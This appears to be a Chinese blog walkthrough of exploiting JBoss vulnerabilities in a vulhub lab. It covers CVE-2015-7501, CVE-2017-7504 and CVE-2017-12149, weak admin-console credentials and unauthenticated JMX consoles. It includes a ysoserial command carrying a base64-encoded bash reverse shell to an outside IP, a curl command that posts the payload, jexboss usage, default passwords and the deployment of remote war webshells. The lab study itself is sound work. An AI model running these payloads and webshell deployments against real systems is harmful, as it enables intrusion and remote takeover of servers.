Jboss漏洞攻略

一,CVE-2015-7501

1,搭建好环境后访问

2,访问http://121.40.229.129:8080/invoker/JMXInvokerServlet,返回如下说明有漏洞

3,将反弹shell进⾏base64编码

4,通过ysoserial ⼯具进⾏漏洞利⽤

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjIuNTEuMjQ1Lzg4ODggMD4mMQ==}|{base64,-d}| {bash,-i} ">exp.ser

5,进行监听

6,执行命令后查看监听发现反弹成功

curl http://47.122.51.245:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

二,CVE-2017-7504

1,搭建好环境后访问漏洞地址

http://47.122.51.245:8081/jbossmq-httpil/HTTPServerILServlet

2,在kali中使用工具来进行漏洞利用

python3 jexboss.py -u http://47.122.51.245:8081

三,CVE-2017-12149

1,搭建好环境后访问

2,验证是否有漏洞

3,直接使用工具来漏洞利用

四,Administration Console弱⼝令

1,搭建好环境后直接访问http://47.122.51.245:8080/admin-console/login.seam

账户密码:admin    vulhub

2,找到如图所示位置

3,上传文件,将JSP压缩为ZIP,修改后缀为war上传

4,使用哥斯拉连接

五,低版本JMX Console未授权

1,搭建好环境后访问http://47.122.51.245:8081/jmx-console/

正常环境⽆需密码直接可进⼊,需要用户名密码就是admin     admin 

2,下拉找到如图所示内容点击

3,找到void addURL() 选项远程加载war包来部署,用我们前面用到的shell.war

http://47.122.51.245/cmd.war

4,部署后会跳到如图所示页面,使用哥斯拉连接就可以了

六,⾼版本JMX Console未授权

1,搭建好环境后访问http://47.122.51.245:8080/jmx-console/

账户密码:admin vulhub

2,找到图1所示内容点击,在图2位置部署远程war包地址

http://47.122.51.245/shell.war

3,点击Invoke,来到如图页面

4,使用哥斯拉连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值